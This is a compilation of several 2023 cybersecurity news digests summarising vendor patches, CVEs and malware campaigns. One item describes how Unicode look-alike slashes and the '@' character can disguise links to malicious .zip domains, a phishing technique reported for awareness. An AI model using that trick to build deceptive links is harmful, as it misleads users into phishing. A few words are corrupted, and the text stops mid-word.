Vulnerabilities in cloud platforms Otorio’s team of researchers found 11 vulnerabilities affecting different cloud management platform providers. Sierra Wireless, Teltonika Networks and InHand Networks are the affected companies. The security flaws affecting Teltonika Networks are CVE-2023-32346, CVE-2023-32347, CVE-2023-32348, CVE-2023-2586, CVE-2023-2587 and CVE-2023-2588 identified in the remote management system (RMS). Their exploitation could expose confidential information and allow remote code execution (RCE). Regarding the vulnerabilities in InHand Networks CVE-2023-22600, CVE-2023-22598, CVE-2023-22599, CVE-2023-22597 and CVE-2023-2261 these could be exploited by malicious actors to perform RCE. Lastly, the flaws identified in Sierra Wireless CVE-2023-31279 and CVE-2023-31280 could allow an attacker to search for unregistered devices that are connected to the cloud, obtain their serial numbers and register them to an account under their control for the purpose of executing commands. More info → The new .zip TLD under the researchers' magnifying glass Google has opened the registration of new domains on May 3 under eight new TLDs including .dad, .esq, .prof, .phd, .nexus, .foo, .mov and especially .zip. The registration of the latter is generating a lot of controversy among the security community as it can be used in phishing campaigns distributing compressed .zip files. Some researchers have already managed to exploit the existence of these domains together with the use of special characters in the address bar and disguise links to malicious files under URLs that appear to be legitimate. An adversary could do this by using special Unicode characters such as the U+2044 (⁄) and U+2215 (∕) slashes that visually resemble the conventional slash character, U+002F (/) and exploit the way some browsers interpret the at (@) character in a URL to achieve unwanted redirects. For this reason, it is recommended to pay attention to all those links containing the characters U+2044 (⁄) and U+2215 (∕), which also include an at-arrow and point to allegedly compressed .zip files since they could actually include a disguised redirect to domains of this new TLD.. More info → Critical Vulnerabilities in Cisco Small Business Series Switches Cisco has issued a security advisory stating that it has fixed nine critical vulnerabilities in its Small Business Series Switches products. The vulnerabilities have been assigned the following CVEs and CVSS: CVE-2023-20159 (CVSS: 9.8), CVE-2023-20160 (CVSS: 9.8), CVE-2023-20161 (CVSS: 9.8), CVE-2023-20189 (CVSS: 9.8), CVE-2023-20024 (CVSS: 8.6), CVE-2023-20156 (CVSS: 8.6), CVE-2023-20157 (CVSS: 8.6), CVE-2023-20158 (CVSS: 8.6), CVE-2023-20162 (CVSS: 7.5). All of the security holes affect Small Business Series Switches versions 200, 250, 300, 350, 350X and 500 and are due to improper validation of requests sent to the web interface. This could allow an unauthenticated remote threat actor to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. Cisco reports that it has issued software updates that address these vulnerabilities and that there are no workarounds, so it is recommended to upgrade to the latest version available. More info → Google fixes critical vulnerability in Chrome 113 Google has issued a security update for Chrome 113 that fixes a total of 12 vulnerabilities, one of them critical. This last one, identified as CVE-2023-2721 and still pending CVSS, is a use-after-free (UAF) vulnerability that would allow a remote attacker to create an HTML page that triggers a heap corruption situation when a user accesses it. For an attacker to exploit this security flaw, it would be necessary to convince the user to visit the page. This and five other fixed vulnerabilities have been reported to Google by external researchers for rewards ranging from $1500 to $7000. This update is available for versions 113.0.5672.126 on Mac and Linux devices and 113.0.5672.126/.127 for Windows. More info → Apple fixes three 0-day vulnerabilities and dozens of other CVEs across its portfolio Apple has recently issued security updates for iOS, iPadOS, macOS, tvOS, watchOS and the Safari web browser; and warned about three 0-day vulnerabilities that would be actively exploited. Those security flaws affect the WebKit browser engine that Apple employs in its Safari browser, and requires it to be used by other browsers on iOS. The first vulnerability (CVE-2023-32409) is a sandbox leak that allows remote attackers to escape web content sandboxes. The other two (CVE-2023-28204 and CVE-2023-32373) consist of an out-of-bounds read that allows threat actors to gain access to sensitive information and achieve arbitrary code execution on compromised devices. The CVEs were recently assigned, so detailed information is not available. Apple recommends that all users update their devices to the latest version available. More info →

Security updates vulnerabilities in Fortinet products Fortinet has announced a set of security updates that fix up to a total of 9 vulnerabilities, 2 of which are considered high severity and affect FortiADC, FortiOS and FortiProx. On the one hand, there is the security flaw registered as CVE-2023-27999 that affects FortiADC versions 7.2.0, 7.1.1 and 7.1.0. A malicious actor could exploit this flaw through crafted arguments to existing commands, allowing them to execute unauthorized commands. On the other hand, there is vulnerability CVE-2023-22640, which arises from a bug in the sslvpnd component of FortiOS versions 7.2.x, 7.0.x, 6.4.x, 6.2.x and 6.0.x and in FortiOS versions 7.2.x, 7.0.x, 2.0.x and 1.xx of FortiProxy. This bug allows an authenticated attacker to send specially crafted requests for the purpose of arbitrary code execution. Fortinet recommends updating assets to the latest version available to correct these bugs. More info → Intel investigates private key leak after MSI incident MSI recently confirmed a data breach suffered in a security incident that would have caused the leakage of private keys affecting numerous devices. As a result, Intel is investigating a possible leak of Intel Boot Guard private keys. This asset is a security feature that protects the operating system boot process on Intel processors. Malicious actors could then use this leak to disable the Boot Guard protection on affected systems, allowing them to insert malicious software into the boot process. The Binarly research team has published a list of affected MSI hardware. More info → Microsoft Patch Tuesday includes actively exploited 0-day vulnerabilities In its latest security update, Microsoft has fixed a total of 38 vulnerabilities affecting several of its products, including Microsoft Windows, SharePoint and Office, of which 6 have been categorized as critical and 32 as important. Among all of them, three 0-day vulnerabilities stand out, two of which are being actively exploited. These vulnerabilities, registered as CVE-2023-29336, CVSSv3 of 7.8 according to the manufacturer, are a flaw in the Win32k kernel that could be exploited by malicious actors in order to obtain SYSTEM privileges. On the other hand, the security flaw registered as CVE-2023-24932, CVSSv3 of 6.7 according to manufacturer, is a security flaw in the secure boot mode that could be used to install the BlackLotus UEFI malware. The last of the 0-day vulnerabilities catalogued as CVE-2023-29325, CVSSv3 of 8.1 according to the manufacturer, although it has not been actively exploited, is a security flaw in Windows OLE of Microsoft Outlook that can be exploited by means of specially crafted emails and trigger remote code execution. More info → SAP fixes 28 vulnerabilities at its May patch day SAP has released 24 security notes, including a total of 28 vulnerabilities, two of which are classified as critical and nine of which are high priority. Note No. 3328495, considered critical with a CVSS score of 9.8, fixes five vulnerabilities in version 14.2 of the Reprise License Manager (RLM) component used with SAP 3D Visual Enterprise License Manager. On the one hand, the one identified as CVE-2021-44151, would allow an attacker to hijack the session through brute force. On the other hand, the one classified as CVE-2021-44152, could lead to an unauthenticated user changing the password of any user, gaining access to their account. CVE-2021-44153 could be exploited to execute a malicious binary. CVE-2021-44154 could cause a buffer overflow. Lastly, the one identified as CVE-2021-44155, would allow an attacker to enumerate valid users. It is recommended to upgrade SAP 3D Visual Entreprise License Manager to version 15.0.1-sap2, in addition to disabling the RLM web interface. Additionally, #3307833, with CVSS 9.1, includes information disclosure bug fixes for SAP BusinessObjects Business Intelligence Platform. More info → New details about the distribution of Amadey and Redline Stealer McAfee Labs has published an analysis of the malicious executable with which various types of malware such as Amadey and Redline Stealer are distributed. Its original name is wextract.exe.mui and, inside it, there is a CAB file, which contains an attribute called RUNPROGRAM, used to start cydn.exe, which contains two other executables, aydx.exe and mika.exe, which are deployed as malware. On the other hand, there is another attribute, POSTRUNPROGRAM, which contains an instruction to run vona.exe. All these executables are placed in the TEMP folder as temporary files, and are linked, along with other executables from their secondary processes to Redline Stealer and Amadey, as well as disabling security mechanisms. More info → Featured photo: Freepik.

Critical vulnerability in Zyxel firewalls Network equipment manufacturer Zyxel has released security patches for a critical vulnerability affecting its firewalls. The vulnerability, which was discovered and reported by the TRAPA Security team, has been classified as CVE-2023-28771 and with CVSS of 9.8. It allows an unauthenticated attacker to execute some operating system commands remotely by sending manipulated packets to an affected device. The security flaw affects firmware versions of ATP (ZLD V4.60 to V5.35, patched in ZLD V5.36); USG FLEX (ZLD V4.60 to V5.35, patched in ZLD V5.36) VPN (ZLD V4.60 to V5.35, patched in ZLD V5.36), ZyWALL/USG (ZLD V4.60 to V4.73, patched in ZLD V4.73). The vulnerability is not known to have been exploited so far; however, Zyxel recommends that firewalls be upgraded to the latest available version. More info → Google releases Chrome 113 with 15 security updates Google has released to the stable channel version 113 of Google Chrome for Windows, macOS and Linux, which fixes up to 15 vulnerabilities, 10 of them reported to Google through its bug bounty program. None of the vulnerabilities now fixed are of high criticality, being the most relevant the one cataloged as CVE-2023-2459, still without CVSS, but for which Google has paid 7,500 dollars to the researcher Rong Jian. This is an inappropriate implementation issue in Prompts, its severity is considered medium and would allow a remote attacker to bypass permission restrictions through a manipulated HTML page. This latest iteration of the browser is now deployed as Chrome version 113.0.5672.63 for Linux and macOS, and as Chrome versions 113.0.5672.63/.64 for Windows. More info → Vulnerabilities in BGP protocol allow attackers to carry out DoS attacks Researchers at Forescout Vedere Labs have published a report detailing new vulnerabilities in the BGP protocol. The vulnerabilities, already patched and with a CVSS of 6.5, have been classified as CVE-2022-40302, CVE-2022-40318 and CVE-2022-43681. The flaws would be related to parsing of BGP messages found in the FRRouting implementation that could be exploited to achieve a denial of service on vulnerable BGP peers. The DoS condition can be prolonged indefinitely by repeatedly sending malicious packets. It should be noted that two of these issues (CVE-2022-40302 and CVE-2022-43681) can be triggered before FRRouting validates the BGP Identifier and ASN fields. More info → Critical Vulnerability in Cisco Phone Adapters Cisco has issued a security advisory warning of a critical vulnerability in Cisco SPA112 two-port phone adapters. The security flaw in particular, has been logged as CVE-2023-20126, CVSSv3 of 9.8, and is due to a flaw in the authentication process within the firmware update feature. Exploiting this vulnerability could allow an attacker to execute arbitrary code on the affected device with full privileges, and, consequently, could help a threat actor move laterally in a network. However, it is estimated that most of these are not exposed to the Internet, making these flaws susceptible to exploitation from the local network. It should be noted that Cisco has indicated that the affected model has reached the end of its useful life, so it will not receive any security updates and recommends replacing the adapter with the ATA 190 series model. More info → Fleckpe: new Android malware that subscribes victims to premium services Securelist has found a new Android malware called Fleckpe spread through at least 11 apps available on Google Play that together accumulate more than 620,000 downloads. Fleckpe, in particular, subscribes victims, without their permission, to different premium premium services with special pricing, which deliver part of the proceeds to the threat actors. According to Securelist, Fleckpe has been active since 2022 and has been spread through 11 apps (already removed from the market by Google), most of them image editors. Fleckpe works by receiving from C2 the URL where it must subscribe the victim, opens it in invisible mode and copies the confirmation code of the notifications. Once the process is completed, the app works normally, thus avoiding raising suspicions on the part of the victim. More info →

SolarWinds fixes high severity vulnerabilities In its latest security update, SolarWinds has fixed a total of 2 high-severity vulnerabilities, which could lead to command execution and privilege escalation. The more serious of the two vulnerabilities is CVE-2022-36963 (CVSS of 8.8), which is described as a command injection flaw in the SolarWinds infrastructure monitoring and management solution. The second high-severity vulnerability is CVE-2022-47505 (CVSS of 7.8), which refers to a local privilege escalation flaw. Both vulnerabilities were reported by researchers from the Trend Micro Zero Day Initiative and were fixed with SolarWinds version 2023.2. In addition, the new release also resolves the medium severity CVE-2022-47509, which could be exploited remotely to append URL parameters and inject HTML code. SolarWinds finally fixed two medium severity vulnerabilities in Database Performance Analyzer, leading to the disclosure of sensitive information and allowing users to enumerate in different folders on the server, respectively. More info → RustBucket: New malware targeting macOS users Researchers at Jamf Threat Labs have discovered a new malware family targeting macOS users in recent attacks that is capable of obtaining additional payloads from its command and control (C&C) server. The malware, called RustBucket, has been attributed to the North Korean-associated advanced persistent threat (APT) actor BlueNoroff, which is believed to be a subgroup of the notorious Lazarus Group. RustBucket is executed in three stages. The first stage uses fraudulent domains and social engineering techniques, as well as an unsigned application called Internal PDF Viewer.app that is designed to obtain and execute the stage two payload on the system. The second stage consists of a signed application masquerading as a legitimate Apple package identifier; once again the malware begins communicating with the command and control (C&C) server to obtain the stage three payload, which is a signed trojan written in the Rust language that can run on ARM and x86 architectures, collect system information including a list of running processes, identify if it is running in a virtual machine, and also allows the attacker to perform several actions on infected machines. More info → Critical vulnerabilities in Cisco Industrial Network Director and Modeling Labs Cisco has released security updates to patch two critical vulnerabilities in its Industrial Network Director and Modeling Labs products. The first vulnerability is listed as CVE-2023-20036, which has a CVSS of 9.9, and addresses an issue in the Industrial Network Director web interface that would allow an authenticated attacker on the system to modify a request to execute commands with administrative privileges or access sensitive data. The second vulnerability is CVE-2023-20154, has a CVSS of 9.1 and resides in the Cisco Modeling Labs external authentication mechanism, which could allow an unauthenticated remote attacker to access the web interface with administrative privileges. The latter would affect products condivd with LDAP authentication. More info → Google receives legal authorization to act against CryptBot Following the authorization issued by a federal judge in the Southern District of New York on the civil action against the operators of the CryptBot malware, Google has begun to disable the infrastructure related to its distribution. The complaint would target the largest distributors of CryptBot, allegedly geolocated in Pakistan, and its content would be based on allegations of wire fraud and intellectual property infringement. The company estimates that this malware has infected more than 670,000 computers in the last year, targeting Google Chrome users to exfiltrate their data. The court has issued a temporary injunction to prevent the spread of this malware, which would allow Google to take action against current and future domains linked to the distribution of CryptBot. More info → RTM Locker ransomware targets Linux systems The Uptycs research team has identified a new strain of RTM Locker ransomware targeting Linux operating systems. It is worth noting that security researchers at Trellix recently published an analysis of the TTPs used by the Read The Manual (RTM) group, a provider of Ransomware as a Service (RaaS). However, its development has continued to evolve since then to identify this new strain, which infects Linux, NAS and ESXi hosts and is based on the leaked source code of the Babuk ransomware. It is also characterized by using a combination of ECDH in Curve25519 and Chacha20 to encrypt files, subsequently urging victims to contact support within 48 hours via Tox or threatening to publish data if their demands are not accepted. According to researchers, the threat actor is known to avoid high-profile targets such as critical infrastructure and hospitals, among others, to avoid attracting attention as much as possible. More info →

Google fixes two new actively exploited 0-day vulnerabilities Google has issued new security advisories on the identification of 0-day vulnerabilities affecting the Chrome browser that are being actively exploited. The security flaw has been reported as CVE-2023-2033. This vulnerability is due to a flaw in the Chrome V8 JavaScript engine that could allow a malicious actor to remotely exploit the vulnerability via a specially crafted HTML page. On the one hand, the security flaw, CVE-2023-2136, is in the cross-platform 2D graphics library, Skia, and, if exploited, could lead to incorrect graphics rendering, memory corruption or remote code execution that results in unauthorised system access. More info → LockBit samples found targeting macOS systems MalwareHunterTeam has found a sample LockBit file that contains the ability to infect multiple operating systems, including, for the first time, Apple's macOS. MalwareHunterTeam highlights that this is a remarkable milestone as it is also the first time that one of the major ransomware groups has been known to create malware specifically targeting macOS. The file found includes an encryptor called 'locker_Apple_M1_64', for newer Apple devices, and another for PowerPC CPUs, used by older macOS. An in-depth analysis of the file shows that, so far, this is an early version of this LockBit strain and could not be used in a real attack, but it shows the interest of this ransomware in attacking macOS devices in the near future. More info → New QBot campaign identified Security researchers have published an analysis of the TTPs used in a new campaign of the well-known Qbot malware, which now attacks victims through the use of PDF files and Windows Script Files (WSF). This phishing campaign is distributed via emails that use legitimate email threads and contain an attached PDF file that, when opened, will download a ZIP file containing a WSF file. This file ultimately aims to execute a PowerShell script, which attempts to download a QBot DLL. It is worth noting that numerous actors such as BlackBasta, REvil, PwndLocker, Egregor, ProLock and MegaCortex have used Qbot for initial access to corporate networks. This initial access is done by deploying additional payloads such as Cobalt Strike, Brute Ratel and other malware that allow access to the compromised device.. More info → New PoC enables VM2 sandbox bypassing Security researchers have released a new PoC capable of bypassing the VM2 sandbox, widely used in the development and security world to run and test untrusted code in an isolated environment. This bypass would allow malware to run outside the constraints of the sandbox environment. The first vulnerability was identified as CVE-2023-29017 a fortnight ago, and the last two identified as CVE-2023-29199 and CVE-2023-30547. The latter vulnerability, with a CVSS of 9.8, can be exploited by malicious actors due to a sanitisation flaw that allows the attacker to throw a host exception inside "handleException()". Users are advised to fix the vulnerability by upgrading to version 3.9.17 as soon as possible to avoid a potential security incident. More info → Critical Vulnerabilities in Alibaba Cloud PostgreSQL Databases Security researchers at Wiz have published a paper disclosing two critical vulnerabilities in Alibaba Cloud's PostgreSQL databases. According to the researchers, these flaws allowed unauthorised access to Alibaba Cloud customers' PostgreSQL databases, which could lead to a supply chain attack and remote code execution. It should be noted that the vulnerabilities, which have been named BrokenSesame, were reported to Alibaba Cloud in December 2022, who deployed mitigations on 12 April, although there is no evidence of exploitation. In conclusion, this is a flaw that would allow privilege escalation in AnalyticDB and another for remote code execution in ApsaraDB RDS. More info → Featured photo: Clark van der Beken / Unsplash

Apple fixes two new actively exploited 0-day vulnerabilities Apple has released new security advisories about two new actively exploited 0-day vulnerabilities affecting iPhones, Macs and iPads. First, there is the security flaw registered as CVE-2023-28206, which is an out-of-bounds write to IOSurfaceAccelerator that could trigger data corruption, a crash or code execution. Secondly, the vulnerability assigned as CVE-2023-28205 is a use of WebKit that could allow data corruption or arbitrary code execution by reusing freed memory to create specially crafted malicious web pages controlled by threat actors. Apple recommends updating the software on affected devices to fix the two 0-day vulnerabilities in iOS 16.4.1, iPadOS 16.4.1, macOS Ventura 13.3.1 and Safari 16.4.1 versions. More info → * * * Microsoft Patch Tuesday includes an actively exploited 0-day vulnerability In its latest security update, Microsoft has fixed a total of 98 vulnerabilities affecting several of its products, including Microsoft Windows, Office and Edge. These include an actively exploited 0-day vulnerability which has been registered as CVE-2023-28252, CVSSv3 of 7.8 according to the manufacturer. It is a CLFS flaw that could be exploited locally by malicious actors with the purpose of obtaining SYSTEM privileges. The rest of the critical security flaws, which have been registered as CVE-2023-28311, CVE-2023-21554 and CVE-2023-28231, CVE-2023-28219, CVE-2023-28220, CVE-2023-28250, CVE-2023-28291 should also be mentioned. The last vulnerabilities CVE-2023-28285, CVE-2023-28295, CVE-2023-28287 and CVE-2023-28311, although less critical than the rest, are worth mentioning and although they are not being actively exploited, they could be easily exploited by opening malicious documents sent in possible future phishing campaigns.. More info → * * * Quadreams accused of using spyware against political divs and journalists Researchers from CitizenLab and Microsoft's Threat Intelligence team have published an investigation into the Israeli company QuaDreams, which they accuse of using spyware against journalists and political divs. The company's activity is allegedly based on the sale and distribution of a platform called Reign to government entities, described by Microsoft as a set of exploits, malware and infrastructure designed to exfiltrate information from mobile devices. Of the techniques used to operate it, researchers suspect it is a zero-click exploit for iOS devices, which they have named ENDOFDAYS, that would make use of invisible iCloud invitations. Analysis has identified at least five victims, who currently remain anonymous, in North America, Central Asia, Southeast Asia, Europe and the Middle East. More info → * * * Android security bulletin for April Android has released its security bulletin for the month of April, where it fixes a total of 68 vulnerabilities. Among the vulnerabilities, the most important ones are two detected in the System component, which have been catalogued as CVE-2023-21085 and CVE-2023-21096, both with critical severity, and which could allow a possible attacker to perform a remote code execution (RCE) without the need for additional execution privileges. In addition, four vulnerabilities in Qualcomm's closed source component have also been listed as critical: CVE-2022-33231, CVE-2022-33288, CVE-2022-33289 and CVE-2022-33302. Finally, a vulnerability in the Arm Mali GPU kernel driver, CVE-2022-38181 CVSSv3 8.8, has also been fixed which is reported to have been actively exploited. More info → * * * Azure design flaw allows account takeover An Orca investigation has exposed a design flaw in Microsoft Azure Shared Key that would allow an attacker to gain access to Microsoft Storage accounts. Although Orca has published a proof of concept demonstrating how to steal access tokens from higher privileged identities, move laterally, access critical business assets and execute remote code execution (RCE), Microsoft's Security Response Center has deemed the issue a design flaw and not a vulnerability, so it is unable to provide a security update and will have to wait for a redesign of Azure. In the meantime, it is recommended to remove shared key authorisation from Azure and instead adopt Azure Active Directory authentication as a mitigation strategy. More info →

GitHub exposes its RSA SSH host key by mistake GitHub announced last Friday that they had replaced their RSA SSH host key used to protect Git operations. According to the company, this key was accidentally exposed in a public GitHub repository last week. They acted quickly to contain the exposure and an investigation was launched to discover the cause and impact. While this key does not give access to GitHub infrastructure or user data, this action has been taken to prevent potential spoofing. Users are advised to remove the key and replace it with the new one. More info → * * * Apple fixes an actively exploited 0-day Apple has released security updates fixing an actively exploited 0-day vulnerability in older iPhone, macOS and iPad devices. The flaw, identified as CVE-2023-23529, is a WebKit-type confusion bug, which has a CVSS of 8.8 and could lead to arbitrary code execution, data theft, access to Bluetooth data, etc. It should be noted that, in terms of devices, the vulnerability affects iPhone 6s, iPhone 7, iPhone SE, iPad Air 2, iPad mini and iPod touch, in addition to Safari 16.3 on macOS Big Sur and Monterey, macOs Ventura, tvOS and watchOS. The company recommends updating as soon as possible to avoid possible exploit attempts. More info → * * * Supply chain attack via 3XC video conferencing platform Researchers from various security firms such as SentinelOne, Sophos y CrowdStrike have warned of a supply chain attack via the 3CX video conferencing programme. While the investigation into the attack is still ongoing, it has been confirmed to affect Windows platforms where the compromised 3CXDesktopApp application would download ICO files from GitHub, ultimately leading to the installation of a stealer malware. The first detections of the app's suspicious behaviour in security solutions were reportedly in mid-March 2023, but researchers have identified infrastructure used in the attack with registration dates in February last year. The campaign, which SentinelOne has dubbed SmoothOperator, has no clear attribution, although some researchers point to possible connections to Labyrinth Chollima, part of the North Korean Lazarus Group. 3CX has not made any statement regarding the campaign. More info → * * * Analysis of campaigns exploiting 0-days on Android, iOS and Chrome Google's Threat Analysis Group has published a report sharing details about two campaigns that used 0-day exploits against Android, iOS and Chrome. In the first campaign, 0-day exploit strings targeting Android and iOS were detected and distributed via shortened links sent via SMS to users located in Italy, Malaysia and Kazakhstan. The vulnerability, already fixed in 2022, which affected iOS in versions prior to 15.1, is identified as CVE-2022-42856 and CVSS 8.8, which refers to a type confusion bug in the JIT compiler that can lead to arbitrary code execution. On the other hand, the one identified as CVE-2021-30900, with CVSS 7.8, also fixed, deals with an out-of-bounds writing and privilege escalation bug. As for the Android exploit chain, these targeted users of phones with an ARM GPU running versions earlier than 106. As for the bugs, all fixed, one of them is CVE-2022-3723 (CVSS 8.8), type confusion in Chrome; CVE-2022-4135 (CVSS 9.6), buffer overflow in Chrome's GPU; and CVE-2022-38181 (CVSS 8.8), privilege escalation. It is worth noting that the latter vulnerability was found to be actively exploited. The second campaign, targeting devices in the United Arab Emirates via SMS, consists of several 0-days and n-days targeting Samsung's web browser. The link redirects users to a page developed by spyware vendor Variston and exploits vulnerabilities CVE-2022-4262, CVE-2022-3038, CVE-2022-22706 and CVE-2023-0266. More info →

HinataBot: new botnet dedicated to DDoS attacks Researchers at Akamai have published a report stating that they have identified a new botnet called HinataBot that has the capability to perform DDoS attacks of more than 3.3TB/s. Experts have indicated that the malware was discovered in mid-January, while being distributed on the company's HTTP and SSH honeypots. HinataBot uses exfiltrated user credentials to infect its victims and exploits old vulnerabilities in Realtek SDK devices, CVE-2014-8361, Huawei HG532 routers, CVE-2017-17215, and/or exposed Hadoop YARN servers. Once the devices are infected, the malware executes and waits for the Command & Control server to send the commands. Akamai warns that HinataBot is still under development and that it could implement more exploits, and thus expand its entry vector to more victims and increase its capabilities to carry out attacks with a greater impact. More info → * * * CISA issues eight security advisories on industrial control systems CISA has recently issued a total of eight security advisories warning of critical vulnerabilities in industrial control systems. These new vulnerabilities affect several products from different companies such as Siemens, Rockwell Automation, Delta Electronics, VISAM, Hitachi Energy y Keysight Technologies. The most significant of these vulnerabilities are those affecting the Siemens brand, of which three warnings have been collected affecting its SCALANCE W-700 assets, RADIUS client of SIPROTEC 5 devices and the RUGGEDCOM APE1808 product family, with a total of 25 vulnerabilities with CVSSv3 scores ranging from 4.1 to 8.2. As a result, due to their impact, the warnings for Rockwell Automation's ThinManager ThinServer equipment stand out, with one of its three bugs having a CVSSv3 of 9.8, as does the InfraSuite Device Master asset from Delta Electronics, for which a total of 13 vulnerabilities have been reported. More info → * * * Mispadu: banking trojan targeting Latin America Researchers at Metabase Q Team have published a report on an ongoing campaign targeting banking users in Latin American countries using the Mispadu trojan. According to Metabase Q Team, the trojan has been spread through phishing emails loaded with fake invoices in HTML or PDF format with passwords. Another strategy involves compromising legitimate websites looking for vulnerable versions of WordPress to turn them into its C2 server and spread malware from there. According to the research, the campaign started in August 2022 and remains active, affecting banking users mainly in Chile, Mexico and Peru. In November 2019, ESET first documented the existence of Mispadu (also known as URSA), a malware capable of stealing money and credentials, as well as acting as a backdoor, taking screenshots and logging keystrokes. More info → * * * New 0-day vulnerabilities against different manufacturers during Pwn2Own contest The Pwn2Own hacking contest is taking place this week in the Canadian city of Vancouver until Friday 24 March. After the first day, participants have managed to show how to hack into multiple products, including the Windows 11 operating system along with Microsoft Sharepoint, Ubuntu, Virtual Box, Tesla - Gateway and Adobe Reader. It is worth noting that, according to the event's schedule, security researchers will today and tomorrow reveal other 0-days that affect these assets, as well as others such as Microsoft Teams and VMWare Workstation. Last but not least, it is important to point out that after these new 0-day vulnerabilities are demonstrated and disclosed during Pwn2Own, vendors have 90 days to release security patches for these security flaws before the Zero Day Initiative discloses the information publicly. More info → * * * Critical vulnerability in WooCommerce Payments fixed Researcher Michael Mazzolini of GoldNetwork reported a vulnerability in WooCommerce Payments this week, which has resulted in a security update being forced to be installed. The vulnerability does not yet have a CVE identifier, although it has been assigned a CVSSv3 criticality of 9.8, being a privilege escalation and authentication bypass vulnerability, which could allow an unauthenticated attacker to impersonate an administrator and take control of the online retailer's website. It should be noted that no active exploitation has been detected so far, although Patchstack has warned that since no authentication is required for exploitation, it is likely to be detected in the near future. The affected versions range from 4.8.0 to 5.6.1, and the vulnerability has been fixed in version 5.6.2. More info →

A new version of the Xenomorph banking trojan ThreatFabric researchers have detected a new variant of the Android banking trojan Xenomorph. This malware family was first detected in February 2022 and is attributed to Hadoken Security Group. Xenomorph V3 or Xenomorph.C, which is how this new variant has been classified, is being distributed via the Zombinder platform, in the Google Play store, appearing as a supposed currency converter, which downloads an update to an application posing as Google Protect. One of the main new features of this version is the introduction of an ATS (Automated Transfer Systems) framework used to automatically extract credentials, account balance, initiate transactions, obtain MFA tokens and finalise fund transfers. It has also added Cookie stealer capabilities. Xenomorph V3 is capable of attacking more than 400 banking and financial institutions, including cryptocurrency wallets, a very significant increase in the volume of victims, as in its first version it only targeted 56 European banks. It should also be noted that Spanish banking institutions are the main targets, followed by Turkey, Poland and the United States. Researchers point out that this is one of the most advanced and dangerous trojans in circulation, and that it could become more so as it is likely to start being distributed as MaaS. More info → * * * Microsoft Patch Tuesday includes two actively exploited 0-days In its latest security update, Microsoft has fixed a total of 83 vulnerabilities affecting several of its products, including Microsoft Windows, Office, Exchange and Azure. Nine of these vulnerabilities are reported to have received a critical severity score, and another 69 are reported to have been rated as "important". Among them, two of these security bugs are reported to be 0-day actively exploited, CVE-2023-23397, a privilege escalation vulnerability in Outlook with a CVSSv3 score of 9.8 and CVE-2023-24880, a security feature bypass vulnerability in Windows SmartScreen with a CVSSv3 score of 5.4. In relation to vulnerability CVE-2023-23397, Microsoft has also published a script for this vulnerability. It should be noted that according to the research, this vulnerability has been exploited as a 0-day since at least April 2022, with fifteen organisations known to have been attacked using this vulnerability. The vulnerability was discovered by the Ukrainian Computer Emergency Response Team (CERT-UA), which informed Microsoft. This vulnerability could be exploited by an attacker to send a specially crafted email against an Outlook client, which is automatically triggered when Outlook retrieves and processes it, leading to exploitation before the email is seen in the preview pane, and thus stealing NTLM credentials. More info → * * * YoroTrooper: new threat actor focused on cyber espionage Researchers at Cisco Talos have detected a new threat actor focused on executing cyberespionage campaigns. YoroTrooper, as the researchers have named it, has been active since at least June 2022, although it was not until February 2023 that it gained popularity. YoroTrooper campaigns have so far been detected targeting government and energy organisations in Commonwealth of Independent States (CIS) countries, as well as the World Intellectual Property Organisation (WIPO) and a European Union healthcare agency. The entry vector for the attacks is via phishing emails with a malicious attachment. YoroTrooper uses several remote access trojans such as AveMaria/Warzone RAT, LodaRAT and a custom Python implant. It also uses stealers such as Stink Stealer, and the Nuitka or PyInstaller frameworks. Telegram is also used as C2 for communications between the operators and the installed malware. More info → * * * CISA warns of 0-day exploit in Adobe and urges patch application The US Cybersecurity and Infrastructure Security Agency (CISA) has warned of 0-day exploitation of vulnerability CVE-2023-26360 in Adobe ColdFusion and has given all government agencies a three-week deadline to apply the patch released Wednesday by Adobe. Although Adobe's Patch Tuesday stated that the vulnerability had been exploited in a very limited way, CISA raised the alert level by calling the need for patching urgent and mandatory, confirming the words of Charlie Arehart, who discovered the vulnerability and criticised Adobe for the lack of importance given to the vulnerability, which allows the execution of arbitrary code. More info → * * * 0-day vulnerabilities in Samsung's Exynos chipsets Google's security team, Project Zero, disclosed in a publication the existence of 18 0-day vulnerabilities in Samsung's Exynos chipsets, used in mobile devices, laptops and cars. Four of these flaws are the most serious; this would be the case of the vulnerability identified as CVE-2023-24033 and three others that have not yet been assigned a CVE, whose exploitation would allow remote code execution from the Internet to the baseband and for which the attacker would not need the interaction of the victim, only their phone number. On the other hand, the rest of the vulnerabilities, some of them identified as CVE-2023-26072, CVE-2023-26073, CVE-2023-26074, CVE-2023-26075, CVE-2023-26076, have not been scored as serious as they require a malicious mobile network operator or the attacker to have local access to the device. As for the affected devices, Samsung has issued a security update indicating which devices are affected. Finally, in terms of patches, Pixel devices have received a fix for one of the vulnerabilities, while other affected users are advised to disable Wi-Fi and Voice-over-LTE calling. More info →

FBI and ICSA Launch Advisory to Combat Royal Ransomware The FBI and ICSA launched the #StopRansomware: Royal Ransomware Cyber Security Advisory on 2 March to help combat this type of ransomware by disseminating TTPs and IOCs. Many companies in different critical infrastructure sectors such as industry, telecommunications, healthcare, education, among others, have been breached with this ransomware variant since September 2022. The FBI and CISA believe that Royal uses its own file encryption software, disabling antivirus when gaining access to a system and leaking data before finally deploying the ransomware. They then demand ransoms of between one and eleven million dollars in Bitcoin and in the note they leave victims a .onion site for contact Organisations are advised to implement the recommendations and mitigations in the advisory to prevent these attacks. More info ⇾ * * * Hiatus: worldwide campaign against business routers The Lumen Black Lotus Labs team has identified an active campaign targeting business routers. The campaign, which has been named "Hiatus", has been active since July 2022, targeting end-of-life DrayTek Vigor 2960 and 3900 routers with an i386 architecture. The entry vector is currently unknown, but once the router has been compromised, the threat actors implement a bash script that downloads and executes two malicious binaries: HiatusRAT and a variant of tcpdump for capturing packets. According to the researchers, at least 100 victims have been detected and have become part of the botnet of the malicious actors, mostly located in Europe, North America and South America. Lumen Black Lotus Labs estimates that the threat actors kept the campaign at low infection levels in order to evade detection by not attracting as much attention. More info ⇾ * * * SYS01stealer: new infostealer targeting critical infrastructures The research team at Morphisec has published a report on a new infostealer targeting critical government infrastructures which they have named SYS01stealer. The malicious actors behind this threat specifically try to target corporate Facebook accounts by using Google ads and fake Facebook profiles that provide download links promoting games, adult content, software, but are actually malicious. It is worth noting that once the victim downloads the .zip file, and it is executed, the file will proceed to perform a DLL sideload inside the victim's system. Experts point out that SYS01stealer's goal is to steal browser cookies and exploit authenticated Facebook sessions to exfiltrate information from the victim's Facebook account. The malware can also upload files from the infected system to the Command & Control server and execute commands sent by it. More 